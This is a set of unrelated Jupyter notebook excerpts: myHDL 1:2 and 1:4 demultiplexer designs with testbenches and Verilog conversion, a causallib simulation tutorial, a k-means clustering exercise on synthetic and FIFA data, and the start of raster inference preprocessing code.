DEMUX1_4_Combo_TB(): """ myHDL only testbench for module `DEMUX1_4_Combo` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s0.next=int(s0TVs[i]) s1.next=int(s1TVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_Combo_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's1', 's0', 'y0', 'y1', 'y2', 'y3') DEMUX1_4_ComboData=Peeker.to_dataframe() 
DEMUX1_4_ComboData=DEMUX1_4_ComboData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] DEMUX1_4_ComboData DEMUX1_4_ComboData['y0Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_0EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData['y1Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_1EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData['y2Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_2EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData['y3Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_3EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData Test0=(DEMUX1_4_ComboData['y0']==DEMUX1_4_ComboData['y0Ref']).all() Test1=(DEMUX1_4_ComboData['y1']==DEMUX1_4_ComboData['y1Ref']).all() Test2=(DEMUX1_4_ComboData['y2']==DEMUX1_4_ComboData['y2Ref']).all() Test3=(DEMUX1_4_ComboData['y3']==DEMUX1_4_ComboData['y3Ref']).all() Test=Test0&Test1&Test2&Test3 print(f'Module `DEMUX1_4_Combo` works as exspected: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_4_Combo'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_Combo_RTL.png}} \caption{\label{fig:D14CRTL} DEMUX1_4_Combo RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_Combo_SYN.png}} \caption{\label{fig:D14CSYN} DEMUX1_4_Combo Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_Combo_IMP.png}} \caption{\label{fig:D14CIMP} DEMUX1_4_Combo Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] s0TVs=intbv(int(''.join(s0TVs.astype(str)), 2))[TestLen:] s1TVs=intbv(int(''.join(s1TVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), s0TVs, bin(s0TVs), s1TVs, bin(s1TVs) @block def DEMUX1_4_Combo_TBV(): """ myHDL -> testbench for module `DEMUX1_4_Combo` """ x=Signal(bool(0)) 
s0=Signal(bool(0)) s1=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) y2=Signal(bool(0)) y3=Signal(bool(0)) @always_comb def print_data(): print(x, s0, s1, y0, y1, y2, y3) #Test Signal Bit Vectors xTV=Signal(xTVs) s0TV=Signal(s0TVs) s1TV=Signal(s1TVs) DUT=DEMUX1_4_Combo(x, s0, s1, y0, y1, y2, y3) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s0.next=int(s0TV[i]) s1.next=int(s1TV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_4_Combo_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_4_Combo_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit \begin{figure} \centerline{\includegraphics[width=5cm]{DEMUX14PYNQZ1Circ.png}} \caption{\label{fig:D14Circ} 1:4 DEMUX PYNQ-Z1 (Non SoC) conceptualized circuit} \end{figure} ### Board Constraints ``` ConstraintXDCTextReader('DEMUX1_4'); ``` ### Video of Deployment DEMUX1_4_Combo on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=VT5Iyy8dMdg)) # 1 Channel Input:4 Channel Output demultiplexer via DEMUX Stacking ## myHDL Module ``` @block def DEMUX1_4_DMS(x, s0, s1, y0, y1, y2, y3): """ 1:4 DEMUX via DEMUX Stacking Inputs: x(bool): input feed s0(bool): channel select 0 s1(bool): channel select 1 Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 y2(bool): ouput channel 2 y3(bool): ouput channel 3 """ s0_y0y1_WIRE=Signal(bool(0)) s0_y2y3_WIRE=Signal(bool(0)) x_s1_DEMUX=DEMUX1_2_Combo(x, s1, s0_y0y1_WIRE, s0_y2y3_WIRE) s1_y0y1_DEMUX=DEMUX1_2_Combo(s0_y0y1_WIRE, s0, y0, y1) s1_y2y3_DEMUX=DEMUX1_2_Combo(s0_y2y3_WIRE, s0, y2, y3) return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=3)) xTVs=np.array([i[2] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) s0TVs=np.array([i[1] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint 
values for each call np.random.seed(16) s0TVs=np.append(s0TVs, np.random.randint(0,2, TestLen)).astype(int) s1TVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(17) s1TVs=np.append(s1TVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, xTVs, s0TVs, s1TVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s0=Signal(bool(0)); Peeker(s0, 's0') s1=Signal(bool(0)); Peeker(s1, 's1') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') y2=Signal(bool(0)); Peeker(y2, 'y2') y3=Signal(bool(0)); Peeker(y3, 'y3') DUT=DEMUX1_4_DMS(x, s0, s1, y0, y1, y2, y3) def DEMUX1_4_DMS_TB(): """ myHDL only testbench for module `DEMUX1_4_DMS` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s0.next=int(s0TVs[i]) s1.next=int(s1TVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_DMS_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's1', 's0', 'y0', 'y1', 'y2', 'y3') DEMUX1_4_DMSData=Peeker.to_dataframe() DEMUX1_4_DMSData=DEMUX1_4_DMSData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] DEMUX1_4_DMSData Test=DEMUX1_4_DMSData==DEMUX1_4_ComboData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] Test=Test.all().all() print(f'DEMUX1_4_DMS equivlinet to DEMUX1_4_Combo: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_4_DMS'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_DMS_RTL.png}} \caption{\label{fig:D14DMSRTL} DEMUX1_4_DMS RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_DMS_SYN.png}} \caption{\label{fig:D14DMSSYN} DEMUX1_4_DMS Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_DMS_IMP.png}} \caption{\label{fig:D14DMSIMP} DEMUX1_4_DMS Implementated 
Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] s0TVs=intbv(int(''.join(s0TVs.astype(str)), 2))[TestLen:] s1TVs=intbv(int(''.join(s1TVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), s0TVs, bin(s0TVs), s1TVs, bin(s1TVs) @block def DEMUX1_4_DMS_TBV(): """ myHDL -> testbench for module `DEMUX1_4_DMS` """ x=Signal(bool(0)) s0=Signal(bool(0)) s1=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) y2=Signal(bool(0)) y3=Signal(bool(0)) @always_comb def print_data(): print(x, s0, s1, y0, y1, y2, y3) #Test Signal Bit Vectors xTV=Signal(xTVs) s0TV=Signal(s0TVs) s1TV=Signal(s1TVs) DUT=DEMUX1_4_DMS(x, s0, s1, y0, y1, y2, y3) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s0.next=int(s0TV[i]) s1.next=int(s1TV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_4_DMS_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_4_DMS_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit See Board Circuit for "1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Board Constraint uses same 'DEMUX1_4.xdc' as "# 1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Video of Deployment DEMUX1_4_DMS on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=8A9iDf4nh74)) # 1:2 DEMUX via Behavioral IF ## myHDL Module ``` @block def DEMUX1_2_B(x, s, y0, y1): """ 1:2 DMUX in behavioral Inputs: x(bool): input feed s(bool): channel select Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 """ @always_comb def logic(): if s==0: #take note that since we have #two ouputs there next state values #must both be set, else the last #value will presist till it changes y0.next=x y1.next=0 else: y0.next=0 y1.next=x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=2)) xTVs=np.array([i[1] for i in SystmaticVals]).astype(int) np.random.seed(15) 
xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) sTVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) sTVs=np.append(sTVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, sTVs, xTVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s=Signal(bool(0)); Peeker(s, 's') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') DUT=DEMUX1_2_B(x, s, y0, y1) def DEMUX1_2_B_TB(): """ myHDL only testbench for module `DEMUX1_2_B` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s.next=int(sTVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_2_B_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's', 'y0','y1') DEMUX1_2_BData=Peeker.to_dataframe() DEMUX1_2_BData=DEMUX1_2_BData[['x', 's', 'y0','y1']] DEMUX1_2_BData Test=DEMUX1_2_BData==DEMUX1_2_ComboData[['x', 's', 'y0','y1']] Test=Test.all().all() print(f'DEMUX1_2_BD is equivlent to DEMUX1_2_Combo: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_2_B'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_B_RTL.png}} \caption{\label{fig:D12BRTL} DEMUX1_2_B RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_B_SYN.png}} \caption{\label{fig:D12BSYN} DEMUX1_2_B Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_B_IMP.png}} \caption{\label{fig:D12BIMP} DEMUX1_2_B Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] sTVs=intbv(int(''.join(sTVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), sTVs, bin(sTVs) @block def DEMUX1_2_B_TBV(): """ myHDL -> testbench for 
module `DEMUX1_2_B` """ x=Signal(bool(0)) s=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) @always_comb def print_data(): print(x, s, y0, y1) #Test Signal Bit Vectors xTV=Signal(xTVs) sTV=Signal(sTVs) DUT=DEMUX1_2_B(x, s, y0, y1) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s.next=int(sTV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_2_B_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_2_B_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit See Board Circuit for "1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic" ### Board Constraint uses same 'DEMUX1_2.xdc' as "1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic" ### Video of Deployment DEMUX1_2_B on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=Ux0olpi2ppI)) # 1:4 DEMUX via Behavioral if-elif-else ## myHDL Module ``` @block def DEMUX1_4_B(x, s0, s1, y0, y1, y2, y3): """ 1:4 DEMUX written via behaviorial Inputs: x(bool): input feed s0(bool): channel select 0 s1(bool): channel select 1 Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 y2(bool): ouput channel 2 y3(bool): ouput channel 3 """ @always_comb def logic(): if s0==0 and s1==0: y0.next=x; y1.next=0 y2.next=0; y3.next=0 elif s0==1 and s1==0: y0.next=0; y1.next=x y2.next=0; y3.next=0 elif s0==0 and s1==1: y0.next=0; y1.next=0 y2.next=x; y3.next=0 else: y0.next=0; y1.next=0 y2.next=0; y3.next=x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=3)) xTVs=np.array([i[2] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) s0TVs=np.array([i[1] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) s0TVs=np.append(s0TVs, np.random.randint(0,2, TestLen)).astype(int) 
s1TVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(17) s1TVs=np.append(s1TVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, xTVs, s0TVs, s1TVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s0=Signal(bool(0)); Peeker(s0, 's0') s1=Signal(bool(0)); Peeker(s1, 's1') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') y2=Signal(bool(0)); Peeker(y2, 'y2') y3=Signal(bool(0)); Peeker(y3, 'y3') DUT=DEMUX1_4_B(x, s0, s1, y0, y1, y2, y3) def DEMUX1_4_B_TB(): """ myHDL only testbench for module `DEMUX1_4_Combo` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s0.next=int(s0TVs[i]) s1.next=int(s1TVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_B_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's1', 's0', 'y0', 'y1', 'y2', 'y3') DEMUX1_4_BData=Peeker.to_dataframe() DEMUX1_4_BData=DEMUX1_4_BData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] DEMUX1_4_BData Test=DEMUX1_4_BData==DEMUX1_4_ComboData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] Test=Test.all().all() print(f'DEMUX1_4_B equivlinet to DEMUX1_4_Combo: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_4_B'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_B_RTL.png}} \caption{\label{fig:D14BRTL} DEMUX1_4_B RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_B_SYN.png}} \caption{\label{fig:D14BSYN} DEMUX1_4_B Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_B_IMP.png}} \caption{\label{fig:D14BIMP} DEMUX1_4_B Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 
2))[TestLen:] s0TVs=intbv(int(''.join(s0TVs.astype(str)), 2))[TestLen:] s1TVs=intbv(int(''.join(s1TVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), s0TVs, bin(s0TVs), s1TVs, bin(s1TVs) @block def DEMUX1_4_B_TBV(): """ myHDL -> testbench for module `DEMUX1_4_B` """ x=Signal(bool(0)) s0=Signal(bool(0)) s1=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) y2=Signal(bool(0)) y3=Signal(bool(0)) @always_comb def print_data(): print(x, s0, s1, y0, y1, y2, y3) #Test Signal Bit Vectors xTV=Signal(xTVs) s0TV=Signal(s0TVs) s1TV=Signal(s1TVs) DUT=DEMUX1_4_B(x, s0, s1, y0, y1, y2, y3) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s0.next=int(s0TV[i]) s1.next=int(s1TV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_4_B_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_4_B_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit See Board Circuit for "1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Board Constraint uses same 'DEMUX1_4.xdc' as "# 1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Video of Deployment DEMUX1_4_B on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=MezWijKoDuk)) # Demultiplexer 1:4 Behavioral via Bitvectors ## myHDL Module ``` @block def DEMUX1_4_BV(x, S, Y): """ 1:4 DEMUX written via behaviorial with bit vectors Inputs: x(bool): input feed S(2bit vector): channel select bitvector; min=0, max=3 Outputs: Y(4bit vector): ouput channel bitvector; values min=0, max=15; allowed is: 0,1,2,4,8 in this application """ @always_comb def logic(): #here concat is used to build up the word #from the x input if S==0: Y.next=concat(intbv(0)[3:], x); '0001' elif S==1: Y.next=concat(intbv(0)[2:], x, intbv(0)[1:]); '0010' elif S==2: Y.next=concat(intbv(0)[1:], x, intbv(0)[2:]); '0100' else: Y.next=concat(x, intbv(0)[3:]); '1000' return instances() ``` ## myHDL Testing ``` xTVs=np.array([0,1]) xTVs=np.append(xTVs, np.random.randint(0,2,6)).astype(int) 
TestLen=len(xTVs) np.random.seed(12) STVs=np.arange(0,4) STVs=np.append(STVs, np.random.randint(0,4, 5)) TestLen, xTVs, STVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') S=Signal(intbv(0)[2:]); Peeker(S, 'S') Y=Signal(intbv(0)[4:]); Peeker(Y, 'Y') DUT=DEMUX1_4_BV(x, S, Y) def DEMUX1_4_BV_TB(): @instance def stimules(): for i in STVs: for j in xTVs: S.next=int(i) x.next=int(j) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_BV_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 'S', 'Y', start_time=0, stop_time=2*TestLen+2) DEMUX1_4_BVData=Peeker.to_dataframe() DEMUX1_4_BVData=DEMUX1_4_BVData[['x', 'S', 'Y']] DEMUX1_4_BVData DEMUX1_4_BVData['y0']=None; DEMUX1_4_BVData['y1']=None; DEMUX1_4_BVData['y2']=None; DEMUX1_4_BVData['y3']=None DEMUX1_4_BVData[['y3', 'y2', 'y1', 'y0']]=DEMUX1_4_BVData[['Y']].apply(lambda bv: [int(i) for i in bin(bv, 4)], axis=1, result_type='expand') DEMUX1_4_BVData['s0']=None; DEMUX1_4_BVData['s1']=None DEMUX1_4_BVData[['s1', 's0']]=DEMUX1_4_BVData[['S']].apply(lambda bv: [int(i) for i in bin(bv, 2)], axis=1, result_type='expand') DEMUX1_4_BVData=DEMUX1_4_BVData[['x', 'S', 's0', 's1', 'Y', 'y3', 'y2', 'y1', 'y0']] DEMUX1_4_BVData DEMUX1_4_BVData['y0Ref']=DEMUX1_4_BVData.apply(lambda row:y14_0EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData['y1Ref']=DEMUX1_4_BVData.apply(lambda row:y14_1EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData['y2Ref']=DEMUX1_4_BVData.apply(lambda row:y14_2EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData['y3Ref']=DEMUX1_4_BVData.apply(lambda row:y14_3EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData Test=DEMUX1_4_BVData[['y0', 'y1', 'y2', 'y3']].sort_index(inplace=True)==DEMUX1_4_BVData[['y0Ref', 'y1Ref', 'y2Ref', 'y3Ref']].sort_index(inplace=True) print(f'Module `DEMUX1_4_BVData` works as exspected: {Test}') ``` ## Verilog Conversion ``` DUT.convert() 
VerilogTextReader('DEMUX1_4_BV'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_BV_RTL.png}} \caption{\label{fig:D14BVRTL} DEMUX1_4_BV RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_BV_SYN.png}} \caption{\label{fig:D14BVSYN} DEMUX1_4_BV Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_BV_IMP.png}} \caption{\label{fig:D14BVIMP} DEMUX1_4_BV Implemented Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench (To Do!) ## PYNQ-Z1 Board Deployment ### Board Circuit ### Board Constraints ``` ConstraintXDCTextReader('DEMUX1_4_BV'); ``` ### Video of Deployment DEMUX1_4_BV on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=mVyTlkbJpKg))
github_jupyter
## Running a simulator using existing data Consider the case when input data already exists, and that data already has a causal structure. We would like to simulate treatment assignment and outcomes based on this data. ### Initialize the data First we load the desired data into a pandas DataFrame: ``` import pandas as pd from causallib.datasets import load_nhefs from causallib.simulation import CausalSimulator from causallib.simulation import generate_random_topology data = load_nhefs() X_given = data.X ``` Say we want to create three more variables: covariate, treatment and outcome. It would be difficult to hardwire a graph with many variables, so let's use the random topology generator: ``` topology, var_types = generate_random_topology(n_covariates=1, p=0.4, n_treatments=1, n_outcomes=1, given_vars=X_given.columns) ``` Now we create the simulator based on the variables topology: ``` outcome_types = "categorical" link_types = ['linear'] * len(var_types) prob_categories = pd.Series(data=[[0.5, 0.5] if typ in ["treatment", "outcome"] else None for typ in var_types], index=var_types.index) treatment_methods = "gaussian" snr = 0.9 treatment_importance = 0.8 effect_sizes = None sim = CausalSimulator(topology=topology.values, prob_categories=prob_categories, link_types=link_types, snr=snr, var_types=var_types, treatment_importances=treatment_importance, outcome_types=outcome_types, treatment_methods=treatment_methods, effect_sizes=effect_sizes) ``` Now, in order to generate data based on the given data, we need to specify: ``` X, prop, y = sim.generate_data(X_given=X_given) ``` ### Format the data for training and save it Now that we generated some data, we can format it so it would be easier to train and validate: ``` observed_set, validation_set = sim.format_for_training(X, prop, y) ``` observed_set is the observed dataset (excluding hidden variables). validation_set is for validation purposes - it has the counterfactuals, the treatment assignment and the
propensity for every sample. You can save the datasets to CSV files: ``` covariates = observed_set.loc[:, observed_set.columns.str.startswith("x_")] print(covariates.shape) covariates.head() treatment_outcome = observed_set.loc[:, (observed_set.columns.str.startswith("t_") | observed_set.columns.str.startswith("y_"))] print(treatment_outcome.shape) treatment_outcome.head() print(validation_set.shape) validation_set.head() ```
github_jupyter
# Implementing kmeans from scratch ``` import numpy as np import pandas as pd from tqdm.notebook import tqdm import matplotlib.pyplot as plt from sklearn.datasets import make_blobs from IPython.display import clear_output import time k, n = 3, 2 X, y = make_blobs(n_samples=10, centers=k, n_features=n, random_state=0, cluster_std=4) y fig, ax = plt.subplots(figsize=(6, 6), ncols=1) ax.scatter(X[:,0], X[:,1], s=100, alpha=.5, c=y) plt.tight_layout() plt.show() k = 3 centroids = np.random.rand(k, n) centroids from sklearn.metrics.pairwise import euclidean_distances def update(M): c = M.mean(axis=0) rss = np.power(euclidean_distances(c.reshape(1, -1), M)[0], 2).sum() return c, rss RSS = [] for iteration in range(20): clear_output(wait=True) D = euclidean_distances(centroids, X) y_pred = D.T.argmin(axis=1) markers = ['+', '^', 'o'] fig, ax = plt.subplots(figsize=(16, 8), ncols=2) ax[0].scatter(X[:,0], X[:,1], s=100, alpha=1.0) ax[1].scatter(X[:,0], X[:,1], c=y_pred, s=100, alpha=1.0) for i, c in enumerate(centroids): ax[0].scatter(c[0], c[1], s=100, marker=markers[i]) plt.tight_layout() plt.show() assignment = {} for i, c in enumerate(centroids): assignment[i] = [] for j, f in enumerate(y_pred): if f == i: assignment[i].append(X[j]) A = {} for p, v in assignment.items(): A[p] = np.array(v) irss = 0 for z, w in A.items(): if w.shape[0] == 0: pass else: nc, rss = update(w) irss += rss centroids[z] = nc RSS.append(irss) time.sleep(1) fig, ax = plt.subplots(figsize=(6, 6), ncols=1) ax.plot(RSS) plt.tight_layout() plt.show() y_pred y tp, fp, fn, tn = 0, 0, 0, 0 for i, c in enumerate(y_pred): y_true_i = y[i] for j, z in enumerate(y_pred[i+1:]): s = j + i + 1 y_true_j = y[s] if c == z: if y_true_i == y_true_j: tp += 1 else: fp += 1 else: if y_true_i == y_true_j: fn += 1 else: tn += 1 print(tp, fp, fn, tn) tp / (tp + fp) (tp + tn) / (tp + fp + fn + tn) ``` ## Implementazione sklearn ``` from sklearn.cluster import KMeans, AgglomerativeClustering from sklearn.metrics import 
adjusted_rand_score kmeans = KMeans(n_clusters=3) aggc = AgglomerativeClustering(n_clusters=3) y_pred_k = kmeans.fit_predict(X) y_pred_a = aggc.fit_predict(X) print(y_pred_k) print(y_pred_a) benchmark = {'Kmeans': KMeans(n_clusters=3), 'Agglomerative': AgglomerativeClustering(n_clusters=3)} results = [] for name, alg in benchmark.items(): res = results.append(alg.fit_predict(X)) print(name, adjusted_rand_score(y, y_pred)) ``` ## Real example ``` data_file = 'data/fifa/players_20.csv' P = pd.read_csv(data_file, index_col=0, usecols=range(77)) X = P[['height_cm', 'value_eur']] fig, ax = plt.subplots(figsize=(6, 6), ncols=1) ax.scatter(X.height_cm, X.value_eur) plt.tight_layout() plt.show() kmeans = KMeans(n_clusters=5) y = kmeans.fit_predict(X) def select_points(X, y, cluster): pos = [i for i, x in enumerate(y) if x == cluster] return X.iloc[pos] clusters = [select_points(X, y, c) for c in range(5)] eur_values = np.array([x.value_eur.values for x in clusters], dtype='object') h_values = np.array([x.height_cm.values for x in clusters], dtype='object') fig, ax = plt.subplots(figsize=(16, 6), ncols=3, nrows=1) ax[0].scatter(X.height_cm, X.value_eur, c=y) ax[1].boxplot(h_values) ax[1].set_xlabel('clusters') ax[1].set_title('height') ax[2].boxplot(eur_values) ax[2].set_xlabel('clusters') ax[2].set_title('eur_values') plt.tight_layout() plt.show() ``` ## Scaling data ``` from sklearn.preprocessing import StandardScaler Xs = pd.DataFrame(StandardScaler().fit_transform(X), index=X.index, columns=X.columns) kmeans = KMeans(n_clusters=5) y = kmeans.fit_predict(Xs) clusters = [select_points(Xs, y, c) for c in range(5)] eur_values = np.array([x.value_eur.values for x in clusters], dtype='object') h_values = np.array([x.height_cm.values for x in clusters], dtype='object') fig, ax = plt.subplots(figsize=(16, 6), ncols=3, nrows=1) ax[0].scatter(Xs.height_cm, X.value_eur, c=y) ax[1].boxplot(h_values) ax[1].set_xlabel('clusters') ax[1].set_title('height') ax[2].boxplot(eur_values) 
ax[2].set_xlabel('clusters') ax[2].set_title('eur_values') plt.tight_layout() plt.show() ```
github_jupyter
# Inference Data Mount ``` !mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport 172.31.91.151:/ ./efs_inference_data ``` # For Docker Run / Sagemaker ``` import sys sys.executable ``` # Start Local / Sagemaker Imports ``` import os import rasterio as rio import numpy as np from rasterio.windows import Window from glob import glob from shapely.geometry import Polygon from shapely.geometry import box import geopandas as gpd from rasterio.windows import get_data_window import rasterio as rio from inference_predict import * import boto3 import matplotlib.pyplot as plt # import gdal from rasterio.enums import Resampling from rasterio.vrt import WarpedVRT ``` # Windowing ``` def get_windows(img_dim, patch_size=(240, 240), stride=(240, 240)): patch_size = np.array(patch_size) stride = np.array(stride) img_dim = np.array(img_dim) # to take into account edges, add additional blocks around right side edge and bottom edge of raster new_img_dim = [img_dim[0] + stride[0],img_dim[1] + stride[0]] max_dim = (new_img_dim//patch_size)*patch_size - patch_size ys = np.arange(0, img_dim[0], stride[0]) xs = np.arange(0, img_dim[1], stride[1]) tlc = np.array(np.meshgrid(ys, xs)).T.reshape(-1, 2) tlc = tlc[tlc[:, 0] <= max_dim[0]] tlc = tlc[tlc[:, 1] <= max_dim[1]] windows = [] for y,x in tlc.astype(int): windows.append(Window(x, y, patch_size[1], patch_size[0])) return windows def add_ndvi(data, dtype_1=rio.float32): nir = data[3].astype(dtype_1) red = data[2].astype(dtype_1) # Allow division by zero np.seterr(divide='ignore', invalid='ignore') # Calculate NDVI ndvi = ((nir - red) / (nir + red)).astype(dtype_1) # Rescaling for use in 16bit output ndvi = (ndvi + 1) * (2**15 - 1) # 